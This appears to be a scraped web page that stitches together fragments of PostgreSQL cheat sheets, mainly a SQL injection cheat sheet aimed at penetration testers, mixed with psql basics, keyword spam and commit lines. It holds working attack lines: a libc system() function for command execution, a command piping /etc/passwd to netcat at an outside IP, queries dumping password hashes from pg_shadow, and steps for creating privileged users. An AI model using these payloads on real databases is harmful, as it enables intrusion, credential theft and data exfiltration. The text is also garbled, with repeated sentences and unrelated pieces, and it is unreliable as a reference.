pentestmonkey.net has been down a lot lately, so I copied and cleaned up some of the content from that site. Python cheat sheet all. All the TODO items have been removed now. Some of the queries in the table below can only be run by an admin. Some of the queries in the table below can only be run by an admin. 1 Page (1) Git Eclipse Hotkeys Cheat Sheet. If anyone else has suggestions, feel free to mail pentestmonkey at pentestmonkey dot net. Random Cheat Sheet. 1) source The source is a string that you want to extract substrings that match a regular expression.. 2) pattern The pattern is a POSIX regular expression for matching.. 3) flags The flags argument is one or more characters that control the behavior of the function. PostgreSQL 8 3 Cheat Sheet Overview Postgres OnLine Journal. Linux users can therefore benefit from [...], Tags: mdcrack, passwordcracking, postgresql, Update to Postgres SQL Injection Cheat Sheet, Updated Postgres SQL Injection Cheat Sheet, Cracking Postgres Password Hashes with MDCrack. dennisfisch. Basics Connect as user postgres: psql -U postgres Connect to a specific database: \c database_name; Quit the psql: \q List all databases: \l Lists all tables in the current database: \dt List all users: \du Create a new role username with a password: CREATE ROLE … However if, CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS ‘/lib/libc.so.6′, ‘system’ LANGUAGE ‘C’ STRICT; — privSELECT system(‘cat /etc/passwd | nc 10.0.0.1 8080′); — priv, commands run as postgres/pgsql OS-level user, SELECT inet_server_addr(); — returns db server IP address (or null if using local connection), CREATE USER test1 PASSWORD ‘pass1′; — priv, ALTER USER test1 CREATEUSER CREATEDB; — priv, SELECT current_setting(‘data_directory’); — priv. PostgreSQL String Functions – Cheat Sheet. It’s yours now, enjoy )) DOWNLOAD PDF – priv user can also read/write files by mapping libc functions, Tags: cheatsheet, database, pentest, postgresql, sqlinjection, SELECT usename, passwd FROM pg_shadow — priv, SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user, SELECT usename FROM pg_user WHERE usesuper IS TRUE, SELECT relname, A.attname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind=’r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE ‘public’), SELECT c.relname FROM pg_catalog.pg_class c LEFT JOIN pg_catalog.pg_namespace n ON n.oid = c.relnamespace WHERE c.relkind IN (‘r’,”) AND n.nspname NOT IN (‘pg_catalog’, ‘pg_toast’) AND pg_catalog.pg_table_is_visible(c.oid). Let me know if you have any extra info you think should be included on the cheat sheet. postgres cheat sheet postgres cheat sheet ubuntu postgres cheat sheet for mysql users postgresql cheat sheet pentestmonkey postgresql cheat sheet github postgresql cheat sheet pentest postgres jsonb cheat sheet postgres cli cheat sheet postgres regex cheat sheet. Example: mydb=# \du List of roles Role name | Attributes | Member of -----------+-- … List Privileges: SELECT usename, usecreatedb, usesuper, usecatupd FROM pg_user: List DBA Accounts: SELECT usename FROM pg_user WHERE usesuper IS TRUE: Current Database: SELECT current_database() List Databases: SELECT datname FROM pg_database: List Columns You’ll use psql (aka the PostgreSQL interactive terminal) most of all because it’s used to create databases and tables, show information about tables, and even to enter information (records) into the database.. Reiners spotted that I hadn’t included any info about writing files via SLQ injection in PostgreSQL. Quite interesting if you need to tune-up a postgres setup. ⚠️ OhMyZSH might break this trick, a simple sh is recommended. SQL Injection Cheat Sheets. For PostgreSQL 8.1 and earlier, something similar to the following will allow for command execution (from https://pentestmonkey.net/cheat-sheet/sql-injection/postgres-sql-injection-cheat-sheet): > CREATE OR REPLACE FUNCTION system(cstring) RETURNS int AS ‘/lib/x86_64-linux-gnu/libc.so.6’, ‘system’ LANGUAGE ‘c’ STRICT; 3 Oct 14, updated 12 May 16. development, sql, database, server, postgresql. Here’s a shorter, feature-free version of the perl-reverse-shell: There’s also an alternative PERL revere shell here. Updated Postgres SQL Injection Cheat Sheet Posted on January 21, 2008 by pentestmonkey I just put some finishing touches to the PostgreSQL Injection Cheat Sheet . He’s also written some detailed blogs about SQL injection in MySQL that are worth reading: MySQL Table and Column Names MySQL Into Outfile, Tags: cheatsheet, database, postgresql, sqlinjection, I was looking at the Open Source Vulnerbility Database (OSVDB) recently. \du. MDCrack can crack PostgreSQL’s MD5-based passwords. SQL injection/PostgreSQL Injection.md SQL injection/PostgreSQL Injection.md +13-1 SQL injection/README.md SQL injection/README.md +27 -26 SQL injection/SQLite Injection.md SQL injection/SQLite Injection.md +20 -9 If you want to list all the table names that contain a column LIKE ‘%password%’:SELECT DISTINCT relname FROM pg_class C, pg_namespace N, pg_attribute A, pg_type T WHERE (C.relkind=’r') AND (N.oid=C.relnamespace) AND (A.attrelid=C.oid) AND (A.atttypid=T.oid) AND (A.attnum>0) AND (NOT A.attisdropped) AND (N.nspname ILIKE ‘public’) AND attname LIKE ‘%password%’; SELECT usename FROM pg_user ORDER BY usename LIMIT 1 OFFSET 0; — rows numbered from 0. This helps to highlight any features which are lacking for each database, and enumeration techniques that don’t apply and also areas that I haven’t got round to researching yet. We spent several hours composing PostgreSQL String Functions Cheat Sheet. INSERT INTO mytable(mycol) VALUES (‘